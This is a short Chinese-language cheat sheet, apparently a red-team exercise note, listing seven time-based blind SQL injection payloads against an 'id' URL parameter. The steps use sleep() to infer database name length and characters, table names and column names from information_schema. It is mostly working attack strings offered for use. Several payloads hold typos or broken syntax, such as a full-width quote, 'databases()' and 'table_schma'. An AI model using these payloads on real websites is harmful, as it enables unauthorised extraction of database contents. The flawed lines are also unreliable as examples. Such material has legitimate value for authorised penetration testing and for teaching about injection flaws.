时间盲注例子 · 2022护网笔记

[TOC] ## 1、判断闭合方式 ~~~ ?id=1' sleep(5) --+ ~~~ ## 2、判断数据库的长度 ~~~ ?id=1' if(length(database())>8,1,sleep(5)) --+ ~~~ ## 3、判断数据库的第一个字符 ~~~ ?id=1' if(ascii(substr(database() ,1,1))>110,1,sleep(5)) --+ ~~~ ## 4、判断表的数量 ~~~ ?id=1' if(select length(table_name) from information_schema.tables where table_schema=database())>4,1,sleep(5)) --+ ~~~ ## 5、判断第一个表的名称 ~~~ ?id=1’ if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)>100,1,sleep(5)) --+ ~~~ ## 6、获取字段的数量 ~~~ ?id=1' if((select length(column_name) from information_schema.columns where table_schema=databases() and table_name='表名' limit 0,1)>5,1,sleep(5)) --+ ~~~ ## 7、获取第一个字段的名 ~~~ ?id=1' if((select ascii(substr(column_name,1,1)) from information_schema.columns where table_schma=database() and table_name='表名' limit 0,1)>100,1,sleep(5)) --+ ~~~